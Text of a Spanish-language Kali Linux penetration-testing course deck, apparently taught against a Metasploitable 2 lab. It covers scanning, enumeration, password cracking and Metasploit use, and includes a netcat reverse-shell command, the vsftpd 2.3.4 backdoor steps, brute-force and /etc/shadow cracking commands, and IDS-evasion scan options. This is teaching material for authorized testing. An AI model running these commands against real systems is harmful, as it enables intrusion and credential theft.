Está en la página 1de 63

Kali Linux

Curso
c:\>WHOAMI

Manuel Alejandro Roldan Mella


CEH - CHFI - CCENT - CSX - AWS-SAA

Cybersecurity Specialist, NaranjaX


manuel.roldan80@gmail.com

bit.ly/mroldan
Laboratorio 01

Conceptos básicos 02
Contenido 04 Discovery

Kali Linux 03 del Curso


05 Explotación

06 Web hacking
Laboratorio
Preparando el ambiente
Curso Kali Linux

Configurando nuestro laboratorio


Instalar VirtualBox

1 Descargar 2 Siguiente, siguiente ...

https://www.virtualbox.org/
Curso Kali Linux

Configurando nuestro laboratorio


Instalar Kali Linux

1 Descargar 2 Importar

https://www.offensive-security.com/kali-linux-vm-vm
ware-virtualbox-image-download
Curso Kali Linux

Configurando nuestro laboratorio


Instalar Metasploitable 2

1 Descargar 2 Crear nueva

https://sourceforge.net/projects/metasploitable/files/
Metasploitable2/
Introducción
Conceptos básicos
Kali Linux

Hacker
Persona con conocimientos prácticos que modifican los
usos de las cosas de modo que éstas puedan emplearse Tipos de hacker
para fines no previstos en su origen. No necesariamente
es un cibercriminal

Hacker ético
Persona que, debido a sus normas morales, usa sus Hacktivistas
conocimientos en informática para mejorar un sistema, Ciber-Soldados
descubriendo y reportando sus vulnerabilidades.
Kali Linux

Hacking ético o Pentest


Modalidades de un pentest
Es la utilización de los conocimientos y habilidades para
buscar vulnerabilidades, con el fin de incrementar la Black box Gray Box White box
seguridad. Simulando, en muchos casos, un ataque real.

- Las pruebas se realizan con autorización previa de


los responsables del sistema a analizar

- Es importante la confidencialidad - Conocimiento del objetivo


+
Kali Linux

Tipos de pruebas de intrusión

Network pentest

Se basa en atacar la red y los componentes que la conforman (servidores, switches, routers,
firewalls)

Application pentest
Consiste en atacar una aplicación, esta puede ser: web, móvil o API

Ingeniería Social
Se basa en engañar personas para que revelen información sensible.
Kali Linux

La necesidad de una prueba de intrusión

“Conócete, acéptate, supérate”


San Agustín

Responder:

- ¿Hasta dónde puede llegar?


- ¿Cuál es el impacto?
Proceso de mejora contínua
- ¿Puedo identificar cómo lo hizo?
Kali Linux

Fases de un pentest

NIST SP 800-115
(National Institute of Standards and Technology)
Kali Linux

Fases de un pentest

Planificación

Fase donde se definen las reglas del juego (alcance,


tipo de pruebas, metodología)
Reportar Hallazgos
Reconocimiento y Escaneo (Discover)
Informes y presentaciones
Se obtiene la mayor cantidad de información posibles
del objetivo

Ganar, escalar y mantener Acceso (Attack)


Ataque

Cubrir huellas (Attack)


¿Nos puede ayudar?
Conceptos básicos
Kali Linux

¿Qué es Kali Linux?

Es una distribución Linux orientada a las pruebas de intrusión y auditorias de seguridad. Está basada en Debian y
nació en 2012 como sucesora de BackTrack Linux. Esta creada y mantenida por Offensive Security Ltd.

Ofrece más de 300 herramientas orientadas a ayudarnos a realizar actividades de Ethical Hacking clasificadas de la
siguiente forma:

- Information Gathering - Forensic Tools


- Vulnerability Analysis - Sniffing & Spoofing Web: kali.org
- Wireless Attacks - Maintaining Access Downloads: kali.org/downloads
- Web Applications - Reverse Engineering Tools: https://tools.kali.org/tools-listing
- Exploitation Tools - Password Attacks Última version: 2020.4

Modos: Live y Forensic Mode


Usuarios: kali (password=kali)
Comando Básicos”
echo “
Kali Linux - comandos

Comandos básicos

apt (Advanced Packaging Tool)


Es un programa de gestión de paquetes creado por el proyecto Debian.

- apt update - apt install - apt search


- apt upgrade - apt remove - apt list --installed

man (manual)
man [comando]
Se utiliza para acceder a la documentación disponible de un programa - man apt

Comandos para obtener información:


- uname -a - ifconfig - df -h - free -m - whereis
- lscpu - ip a - lsblk -fm - top - whatis
Kali Linux - comandos

Comandos básicos

Comandos para manejo de archivos y directorios


- mkdir - rm - cat - find - grep - pwd
- cd - ls - less - locate - echo - cp

mkdir -p /home/kali/curso && cd /home/kali/curso && echo “primera linea” >


archivo1.txt
ls /home/kali/curso
locate wordlists | grep users | xargs cp -t /home/kali/curso/
grep www /home/kali/curso/*
cd ..
rm -fr curso
Discovery
Herramientas más destacadas
Fase de reconocimiento

Reconocimiento

En la fase de reconocimiento es cuando se recolecta toda la información posible de nuestro


objetivo.

Información de la Información de los Tools


red sistemas

● Nombres de dominio ● Usuarios ● Arp scan


● Subdominios ● Nombres de los ● Hping3
● Direcciones IP sistemas ● Nmap
● Mecanismos de ● Aplicativos usados ● Net Discover
autenticación ● Contraseñas ● massscan
● Sitios administrativos
NMAP
Escaneos
Fase de escaneo

Ejemplos básicos de NMAP

nmap -sV -O -p 1-65535 x.x.x.x nmap -v -open -sC -T4 x.x.x.x/yy

● -sV Descubrir servicios ● -v Verbosidad


● -p Indica el puerto ● -T Indica cantidad de paquetes por
● -o para descubrir sistema operativo segundo
● x.x.x.x Se sustituye por la IP ● -sC Habilita los scripts básicos
● -open Solo muestra puertos abiertos
● x.x.x.x/yy Se sustituye por la IP y la
nmap -A -Pn dominio
máscara de red
● -A Equivalente a -sV -O -sC
● -Pn Deshabilita el chequeo de host
activo
Fase de escaneo

Ejemplos básicos de NMAP

● -sS Stealth Scan


● --min-rate paquetes por segundo
nmap -sS --min-rate 5000 -Pn -vvv -n x.x.x.x ● -vvv verbosidad al máximo
● x.x.x.x Se sustituye por la IP

nmap -T2 -D RND:10 --spoof-mac Cisco --source-port 53 -sS --data-length 25 x.x.x.x

● -D direcciones falsas en modo random


● --spoof-mac falsifica una MAC address
● --source-port falsifica el puerto origen
● --data-length especifica el tamaño máximo de un paquete
● x.x.x.x Se sustituye por la IP
Fase de escaneo - NMAP

Uso de scripts

nmap -script=”script” -script-args=”n1=v1, n2=v2” X.X.X.X

● –script= podemos especificar una lista de scripts separados por coma


● –script-args= Con esta opción se pueden pasar parámetros a los scripts

Adicionalmente podemos especificar:

● –script-args-file= Argumentos vía archivo


● –script-updatedb Hacer updates de los scripts
● –script-help= Mostar la ayuda

Podremos encontrar una lista detallada de todas las posibilidades con los scripts en el
siguiente enlace:

● https://nmap.org/book/nse-usage.html
Fase de escaneo - puertos

Enumeración
SMTP
El Simple Mail Transfer Protocol (SMTP) es un protocolo de red
utilizado para el intercambio de mensajes de correo electrónico
entre computadoras Tools kali

DNS Domain Name Service ● smtp-enum-users.pl


● dnsenum --enum google.com
Un atacante puede recopilar información de los DNS para ● fierce -dns example.com
obtener hosts claves ● enum4linux
● nbtscan -v -s :
● ldapsearch
Netbios
Es un protocolo que permite que las aplicaciones sobre
diferentes computadoras se comuniquen dentro de una red
local.
Kali Linux

Enum4linux

Es una herramienta utilizada para extraer información via protocol smb. Está escrita en Perl y engloba
las funcionalidades de smbclient, rpclient, net y nslookup.

Parámetros básicos Ejemplos:

-U: Enumera usuarios enum4linux -U x.x.x.x


enum4linux -a x.x.x.x
-S: Enumera carpetas compartidas

-P: Política de passwords Tip: Agregar soporte para NTLMv1


-M: Enumera equipos nano /etc/samba/smb.conf
-a: todas las anteriores
Agregar en la configuración global
-h: ayuda
client min protocol = NT1
Explotación
Herramientas más destacadas
Fase de explotación I

Fase de explotación

En fase se refiere a los procesos de violentar la seguridad de un sistema aprovechando las


vulnerabilidades identificadas en fases anteriores.

Objetivos Tipos Tools

● Ganar acceso ● Activa | Pasiva ● Metasploit


● Escalar privilegios ● Remota | Local ● netcat
● Persistencia ● msfvenom
● Cubrir huellas ● searchsploit
Exploit

Es un fragmento de software, fragmento de datos o secuencia de comandos o acciones, utilizada con el fin


de aprovechar una vulnerabilidad de un sistema para conseguir un comportamiento no deseado del mismo

Locales Remotos

Cuando son ejecutados de forma Cuando son ejecutados en un


local sobre el propio sistema. sistema remoto. El atacante debe
Muy común para escalar tener acceso al sistema víctima
privilegios En cliente

Requieren la intervención del usuario del lado del cliente y son por lo
general asincrónicos
Payload

Es la parte del malware que realiza la acción maliciosa después de haber realizado una explotación
exitosa. Es lo que el exploit inyecta para que se ejecute en la máquina atacada.

Por ejemplo: ejecutar instrucciones para crear un usuario en el sistema remoto, lanzar una shell
disponible es un determinado puerto o lograr una conexión de control remoto por VNC en el sistema
vulnerado.
Conexiones

Cuando se ejecuta un payload es muy común que éste se encargue de facilitarnos una conexión con la
víctima.
Kali Linux - comandos basicos

Netcat

Es una herramienta de red que con una sintaxis sencilla abrir puertos TCP/UDP en un HOST o forzar
conexiones UDP/TCP

Parámetros básicos Ejemplos:

-l: Indica que Netcat abre el puerto para Escucha (Listen): Abrir puerto 4444
nc -lvp 4444
-p: Especifica el puerto
Enviar archivo test.txt hacia otro host
nc -vv 192.168.129.1 4444 < test.txt
-k: Fuerza a que el puerto permanezca abierto tras haber
recibido una Conexión. Enviar salida de shell hacia otro host
nc -e /bin/bash 10.0.2.15 4444
-v: Muestra información de la conexión.
Tip: python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
-t: Las respuestas son compatibles para sesiones de Telnet. stty raw -echo
fg
reset
export SHELL=bash
Kali Linux - comandos basicos

Searchsploit

Esta herramienta permite buscar exploits indexados en la base de datos de Exploit-DB

Parámetros básicos Ejemplos:

-t: busca por titulo del exploit searchsploit -t java Windows

-p: copia la ruta del exploit al portapapeles searchsploit -p 39166

-x: examina un exploit searchsploit -x 39166

searchsploit ubuntu 14.10 -w


--exclude: Excluye resultados de la búsqueda --exclude="Linux Kernel"

-w: muestra la url del exploit en Exploit-DB


Kali Linux

Ejercicio - Hacking FTP

En este ejercicio aprovecharemos una vulnerabilidad de la versión de FTP utilizada en el equipo


víctima

● Paso 1: descubra la versión utilizada: nmap x.x.x.x -v -sV -p 21 -Pn


● Paso 2: Busque información de vulnerabilidades sobre esta versión
● Paso 3: Busque exploits disponibles: searchsploit vsftpd 2.3.4
● Paso 4: use NC para comunicarse por el puerto 21 con la víctima: nc x.x.x.x 21
● Paso 5: Especifique cualquier usuario y password pero agregue :) al final del usuario:
USER manuel:)
PASS cualquiera
● Paso 6: use NC para comunicarse por el puerto 6200 con la víctima: nc x.x.x.x 6200
Password Attacks
Obtener contraseñas

Conjunto de técnicas que son usadas para recuperar passwords y obtener acceso no autorizado.

Ataques no tecnológicos Shoulder Surfing

Ingeniería Social

Ataques activos online

Ataques offline Sniffing

Hombre en el
Ataques pasivos online medio MITM
Kali linux

Ataques activos online

nmap -p 23 --script telnet-brute --script-args userdb=users.lst, passdb=pwds.lst


x.x.x.x

hydra -l root -P /usr/share/wordlists/rockyou.txt x.x.x.x -t 4 ssh

ncrack -p 21 -u root -P claves.txt -T5 x.x.x.x


Tools para diccionarios

Crunch Cewl
# crunch 6 8 1234567890 -o cewl <url> -d <depth> -w <ruta>
/home/kali/curso/diccs/numericwordlist.lst
# crunch 5 7 hack@12 -z gzip -o START
# crunch 6 6 -t geek%% -d 2% -o /root/Escritorio/6.txt

https://github.com/danielmiessler/SecLists/tree/master/Passwords
Diccionarios descargables
Kali - Linux

Ataques pasivos

El atacante copia el archivo de passwords e intenta crackearlos en su propio


equipo o en otra locación

Ambiente Windows

En sistemas operativos Windows las contraseñas Se almacenan en formato hash mediante los
protocolos LM, NTLMv1 o NTLMv2 en una ubicación protegida de escritura.

c:\Windows\System32\config
SAM = Security Account Manager

%SystemRoot%\ntds\NTDS.DIT
NTDS.DIT = New Technologies Directory Services . Directory Information Tree
Kali Linux

Ataques pasivos

Ambiente Linux

Las contraseñas de los usuarios se guardan en formato hash usando por lo general crypt o MD5
en:

Versiones anteriores /etc/passwd


Versiones recientes /etc/shadow
Kali Linux

Estructura de /etc/shadow

Usuario Tipos de Hash

N° de días desde último cambio de contraseña 1 = MD5

N° de días mínimo para poder cambiar contraseña 2 = Blowfish

N° de días máximo para cambiar contraseña 5 = SHA-256

N° de días de advertencia para cambio de contraseña 6 = SHA-512


Kali Linux

JhonTheRipper
Es un programa de criptografía que aplica fuerza bruta para descifrar contraseñas. Es capaz de romper
varios algoritmos de cifrado o hash, como DES, SHA-1 y otros.

Parámetros básicos Ejemplos:

--wordlist=passwords.: Indica un diccionario de claves a john --wordlist=passwords.lst password.txt


utilizar unshadow passwd shadow > passdb.txt
jhon passdb.txt
--show = Muestra los resultados jhon --show passdb.txt
Explotación
Metasploit
Kali Linux

Metasploit

Proyecto Metasploit

Es un proyecto de código abierto creado en 2003 para la seguridad


informática, que proporciona información acerca de vulnerabilidades
y ayuda en tests de intrusión "Pentesting" y el desarrollo de firmas https://www.rapid7.com/
para sistemas de detección de intrusos. https://www.metasploit.com/

Metasploit Framework Es un subproyecto de Metasploit que consiste en una plataforma de


software para desarrollar, probar y ejecutar exploits. Puede usarse para crear herramientas de
prueba de seguridad y módulos de explotación. En 2009 Fue adquirido por la empresa Rapid7
Kali Linux

Módulos de Metasploit

Los módulos implementan las funcionalidades del framework y entre ellos podemos encontrar:

● Auxiliary proporciona herramientas externas al framerwork para la integración y utilización


con Metasploit, así el auditor podrá utilizar escáneres, herramientas para denegación de
servicio, sniffers, fuzzers, etc.
● Encoders proporciona codificadores para ofuscar el código de las shellcodes
● Exploits contiene los exploits. Se organizan en categorías, por sistema operativo o
tecnología.
● Payloads concentra los distintos códigos maliciosos ordenados también por categorías.
● Post almacena en su interior código para ejecutar acciones referidas a las fases de
post-explotación.
Kali Linux

Comandos de Metasploit

Antes de iniciar:

Metasploit ofrece la posibilidad de usar una base de datos para guardar el trabajo realizado.
Para ello debemos tener instalado PostgreSQL y realizar lo siguiente:

1. Iniciar el servicio de PostgreSQL service postgresql start


2. Crear la base de datos, usuario y password: msfdb init
3. Descargar las últimas actualizaciones: apt update -y && apt install metasploit-framework
Kali Linux

Comandos de Metasploit

Comandos Base

msfconsole: Se usa para iniciar el framework vía comandos

help: Muestra los comandos disponibles. También podemos especificar el comando seguido
de -h, o poner help seguido del comando.

search: comando de búsqueda, podemos acotar las búsquedas con palabras clave.

search cve:2018

search cisco type:auxiliary

use: se usa para activar un módulo en particular y cambia el contexto de msfconsole a ese
módulo en particular. Podemos usar back para ir de vuelta a la msfconsole en el contexto
general.
Kali Linux

Comandos de Metasploit

Comandos Base - Show

show options: muestra los parámetros disponibles para el exploit que está en uso.

show advanced: muestra los parámetros disponibles para el exploit que está en uso.

show targets: muestra una lista de sistemas operativos que son vulnerables al exploit
seleccionado

show payloads: muestra los payloads compatibles para el exploit en uso.

show encoders: devuelve los codificadores compatibles. Los codificadores se utilizan para
evadir firmas IDS / IPS
Kali Linux

Comandos de Metasploit

Comandos base

set: sirve para configurar parámetros de un módulo en concreto. Unset, sirve para borrar la
configuración.

setg: nos permite configurar parámetros a nivel global. Unsetg, borra una configuración a nivel
global

save: permite almacenar de forma permanente las variables globales establecidas con el
comando setg y las variables específicas de cada exploit en uso

check: comprueba si el equipo víctima es vulnerable al exploit que queremos usar

exploit: es el comando para lanzar el ataque, si se usa con la opción en -j deja la ejecución en
segundo plano.
Kali Linux

Comandos de Metasploit

Comandos base

jobs: muestra los exploits que se están ejecutando en segundo plano

sessions: nos muestra las sesiones que tenemos con otros equipos que se han generado por
un módulo o exploit.

irb: Permite ejecutar el intérprete de Ruby para metasploit, de este modo se pueden ingresar
comandos y crear scripts al vuelo.

load: Permite cargar un plugin desde el directorio de plugins. unload: Descarga un plugin
cargado

connect: Al igual que realizamos una conexión por medio de telnet o netcat, este comando nos
permite conectarnos a un host remoto
Kali Linux

Comandos de Metasploit

Comandos de base de datos (parte I)

db_connect: sirve para conectarse a una base de datos remota. La sintaxis es:

db_connect <user:[pass]>@<host:[port]>/<database>

db_connect usuario1:admin123@192.168.0.2/metasploit2

db_export: nos permite exportar los datos guardados en nuestra base de datos

db_export -f xml /root/msfu/respaldo.xml

db_import: se usa para importar datos respaldados con db_export.

db_status: Muestra el estado de la conexión con la base de datos


Kali Linux

Comandos de Metasploit

Comandos base

grep: Permite filtrar la salida de un comando mediante un patrón. Su funcionamiento es muy


similar al grep de Linux

history: muestra una lista enumerada todos los comandos que hemos digitado en Metasploit

banner: Nos muestra el banner de bienvenida de Metasploit

color: permite desactivar | activar los colores de la cónsola

get: muestra el valor de una variable

exit: permite salir de Metasploit


Ejercicios prácticos de Metasploit

Paso 1
Ingrese al equipo Metasploitable 2 (msfadmin / msfadmin) y realice lo siguiente:

● 1.1 Eleve privilegios. Ejecute el comando sudo su


● 1.2 Tome nota de la dirección IP del equipo. Ejecute el comando ifconfig

Paso 2
Ingrese al equipo Kali (kali/kali) abra una terminal y realice lo siguiente:

● 2.1 Tome nota de la dirección IP del equipo. Ejecute el comando ifconfig


● 2.2 Compruebe que puede conectarse al equipo Metasploitable
○ Ejecute un ping e intente una conexión telnet
Fase de Explotación - Metasploit - Ejercicios prácticos

Ejercicios prácticos
Ejercicio 1. Iniciando Metasploit

● Paso 1. Haga un update de los índices de apt e instalar Metasploit


○ apt update && apt install metasploit-framework
● Paso 2 Inicie el servicio de Postgres. Ejecute:
○ service postgresql start
● Paso 3 Configure la base de datos en Metasploit. Ejecute:
○ msfdb init
● Paso 4 Inicie Metasploit. Ejecute:
○ msfconsole
● Paso 5 Cree un espacio de trabajo. Ejecute:
○ workspace -a ciberlab
● Paso 6 Cambiese a el espacio de trabajo ciberlab. Ejecute:
○ workspace ciberlab

msfconsole -q -x "workspace;workspace ciberlab"


Fase de Explotación - Metasploit - Ejercicios prácticos

Ejercicios prácticos

Ejercicio 2. Obteniendo información

● Paso 1. Haga un escaneo de puertos y servicios hacia la máquina metasploitable2


○ db_nmap -sV -O -p * -n -v -T5 x.x.x.x
● Paso 2 Verifique los servicios descubiertos
○ services
● Paso 3 Verifique si existen vulnerabilidades encontradas. Ejecute:
○ vulns
● Paso 4 Verifique los hosts encontrados. Ejecute:
○ hosts
Fase de Explotación - Metasploit - Ejercicios prácticos

Ejercicios prácticos

Ejercicio 3. Obteniendo información - Enumerando usuarios vía SMTP

● Paso 1. busque el exploit smtp_enum


○ search smtp_enum
● Paso 2 Elija el exploit correcto para enumerar
○ use auxiliary/scanner/smtp/smtp_enum
● Paso 3 Verifique las opciones disponibles. Ejecute:
○ show options
● Paso 4 Configure el objetivo
○ set RHOSTS x.x.x.x
● Paso 5 ejecute el ataque
○ exploit
Fase de Explotación - Metasploit - Ejercicios prácticos

Ejercicios prácticos

Ejercicio 4. Obteniendo información mediante el protocolo SMB

● Paso 1. busque el auxiliar para enumerar SMB


○ search smb_version
● Paso 2 Elija el exploit correcto para enumerar
○ use auxiliary/scanner/smb/smb_version
● Paso 3 Verifique las opciones disponibles. Ejecute:
○ show options
● Paso 4 Configure el objetivo
○ set RHOSTS x.x.x.x/yy
● Paso 5 ejecute el ataque
○ exploit
Fase de Explotación - Metasploit - Ejercicios prácticos

Ejercicios prácticos

Ejercicio 5. Obteniendo información mediante el protocolo HTTP

● Paso 1. Explore los auxiliares para HTTP


○ search http type:auxiliary
● Paso 2 Elija el exploit correcto para enumerar
○ use auxiliary/scanner/http/http_version
● Paso 3 Configure el objetivo
○ set RHOSTS x.x.x.x
● Paso 4 ejecute el ataque
○ run
● Paso 5 explore otros scripts
○ auxiliary/scanner/http/dir_scanner
○ auxiliary/scanner/http/verb_auth_bypass
Fase de Explotación - Metasploit - Ejercicios prácticos

Ejercicios prácticos

Ejercicio 6. Obteniendo información de bases de datos MSSQL

● Paso 1. busque el exploit mssql


○ search mssql type:auxiliary
● Paso 2 Elija el exploit correcto para enumerar
○ use scanner/mssql/mssql_ping
● Paso 3 Verifique las opciones disponibles. Ejecute:
○ show options
● Paso 4 Configure el objetivo
○ set RHOSTS x.x.x.x
● Paso 5 ejecute el ataque
○ run
Fase de Explotación - Metasploit - Ejercicios prácticos

Ejercicios prácticos

Ejercicio 8. Explotando vulnerabilidades

● Paso 1. Revise si existe una vulnerabilidad para la versión de ftp instalada


○ services -S ftp
● Paso 2 Busque si existe un exploit para la versión de FTP
○ search vsftpd
● Paso 3 Elija el exploit correspondiente. Ejecute:
○ use exploit/unix/ftp/vsftpd_234_backdoor
● Paso 4 Verifique la información disponible:
○ show info
● Paso 5 Configure el objetivo
○ set RHOSTS x.x.x.x
● Paso 6 ejecute el ataque
○ exploit
Fase de Explotación - Metasploit - Ejercicios prácticos

Ejercicios prácticos

Ejercicio 9. Meterpreter

● Paso 1. Escoja el exploit postgres_payload


○ use exploit/linux/postgres/postgres_payload
● Paso 2 Verifique los payloads compatibles
○ show payloads
● Paso 3 Elija el payload meterpreter. Ejecute:
○ set payload linux/x86/meterpreter/bind_tcp
● Paso 4 Configure el objetivo
○ set RHOSTS x.x.x.x
● Paso 5 ejecute el ataque
○ run
Fase de Explotación - Metasploit - Ejercicios prácticos

Ejercicios prácticos

Ejercicio 9. Meterpreter

● Paso 6. Ejecute el comando help y explore las opciones


○ help

● Paso 7. Ejecute los siguientes:


○ sysinfo
○ getuid
○ getpid

También podría gustarte